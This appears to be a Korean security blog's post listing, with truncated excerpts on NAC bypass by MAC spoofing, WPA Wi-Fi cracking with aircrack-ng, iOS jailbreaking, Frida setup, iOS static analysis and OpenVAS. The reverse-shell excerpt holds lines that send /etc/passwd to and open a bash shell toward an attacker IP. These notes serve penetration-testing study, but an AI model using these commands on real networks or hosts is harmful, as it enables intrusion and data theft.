Hack
-
[NAC] Network Access Control 우회 (MAC 탈취 / MAC 고정 )Hack/No filtered 2021. 1. 12. 09:52
[Windows 환경] 1) 정상 사용자의 MAC 탈취 시나리오 1. 와이어샤크를 이용하여 패킷 수집 후 정상 사용자의 MAC 획득 2. TMAC 프로그램을 이용하여 정상 사용자의 MAC으로 변조 3. 네트워크 정상 사용 2) 게이트웨이 IP에 대한 ARP 테이블 정적 등록을 이용한 우회 시나리오 0. 와이어샤크를 이용하여 패킷 수집 후 게이트웨이의 IP 및 MAC 주소 획득 1. 관리자권한으로 cmd 실행 2. arp 테이블 지우기 netsh interface ip delete neighbors 3. 적용할 네트워크 인터페이스 확인 netsh interface show interface 4. arp 테이블 정적 추가 netsh interface ip add neighbors "인터페이스 이름" "게이트..
-
Kali linux를 이용한 AP 해킹 (+windows)Hack/No filtered 2021. 1. 12. 09:42
iwconfig ifconfig wlan0 down [모니터 모드 전환] airmon-ng check kill : 모드 전환 시 간섭 발생 가능성이 있는 프로세스 종료 airmon-ng start wlan0 iwconfig [주변 무선랜 스캔] airodump-ng wlan0mon [타겟 설정] airodump-ng wlan0mon --channel 3 --bssid [bssid] -w [filename] [강제로 다른 사용자 연결 해제] aireplay-ng 0 [인증 해제 횟수] -a [AP의 MAC주소] -c [접속한 장비의 MAC주소] [사전 대입, wpa wpa2] aircrack-ng wpacrack-01.cap -w /usr/share/wordlists/sqlmap.txt [hashcat 사..
-
ios 9.3.3 탈옥Hack/jailbreak 2021. 1. 12. 09:36
pangu를 이용하여 탈옥(jailbreak) 시작! (http://pangu8.com/933.html) 상단에 있는 온라인용 탈옥방법은 Semi 탈옥이므로 주의, 그리고 9.3.2까지만 지원되므로 현혹당하지 않도록 주의바람. [세미탈옥 부분] '세미탈옥 부분'을 Skip하고 'Step by Step guide'를 참고하여 탈옥 시작 (아래 설명은 사이트위주로 참고바람) 1) PC에 파일을 다운로드하고 설치하면 작업표시줄과 바탕화면에 아이콘이 보임 2) 실행하면 디바이스관리자가 (iTunes 중국어버전 같은것) 실행됨 3) iphone을 usb포트를 이용하여 PC와 연결 4) Apple ID와 PW를 적어넣고 진행 (몇초 혹은 몇분 뒤 바탕화면에 PP한문4개) 아이콘 생성 5) 아이폰으로 가서 설정-프로..
-
Frida 환경 구축 with AnacondaHack/Frida 2020. 12. 30. 08:25
1. 아나콘다 파이썬 환경 구축 (www.anaconda.com/products/individual) - 파이썬 설치 (3.7.3) < 아나콘다 설치 시 자동으로 되는듯 - 아나콘다 설치 (4.6.11) - 독립된 파이썬 환경 구축 $ conda create -n py3.7.3 python=3.7.3 -y - 독립된 파이썬 환경 지정 $ activate py3.73 2. 녹스 앱플레이어 설치 - 기본 root 설정 - 모바일설정 : 스마트폰, 그래픽 모드 : 스피드 - adb 환경변수 설정 (C:\Program Files\Nox\bin) 3. 프리다 설치 $ pip install Frida-tools frida 12.4.7 4. 프리다 서버 실행 - 안드로이드 운영체제 스펙 확인 $ adb shell $..
-
reverse shell summaryHack/No filtered 2020. 4. 8. 10:19
1. bash의 /dev/tcp 사용하기 쉘의 기본커맨드창에서 /dev/tcp를 이용하면 리버스쉘을 사용할 수 있다. 예로, cat /etc/passwd > /dev/tcp/공격자의 IP/PORT 이렇게하면 공격자의 IP/PORT로 /etc/passwd의 내용을 전달해준다. 응용하면 공격자에게 쉘까지 열어줄 수 있다. Cheat Sheet : /bin/sh >& /dev/tcp/Attacker_IP/PORT 0>&1 Cheat Sheet : bash -i >& /dev/tcp/Attacker_IP/PORT 0>&1 1: bash -i 2: >& /dev/tcp/Attacker_IP/PORT 3: 0>&1 bash -i는 bash shell을 대화형(interactive)모드로 사용하는 옵션이다. >& /..
-
ios 정적 분석 방법Hack/No filtered 2020. 4. 6. 10:47
1) 앱 설치 경로 파악 find / -name appname 2) 앱 복호화 clutch -d appname or number -> ipa 파일형태로 복호화됨 (그대로 ida에서 리버싱 가능) 3) ipa 파일 압축해제 unzip -d 압축풀경로 appname.ipa 4) 클래스정보 덤프 class-dump-z appname 5) objective-c 코드를 분석 진행 기타) 기본 명령어 otool (암호화된 앱인지 확인할 수 있음) .db 파일 검색 : find / -name *.db sqlite로 db 열어보기 : sqlite3 name.db -> .headers on -> .tables -> select * from table; plist 파일 xml로 변환 : plutil -convert xml..
-
openvas 설치 및 사용법Hack/No filtered 2020. 4. 6. 10:36
apt-get update && apt-get dist-upgrade -y reboot apt-get install openvas openvas-setup openvas-check-setup openvas-start openvasmd --user=admin --new-password= https://127.0.0.1:9392 advanced, confirm security exception 참고 : https://m.blog.naver.com/koromoon/221119393938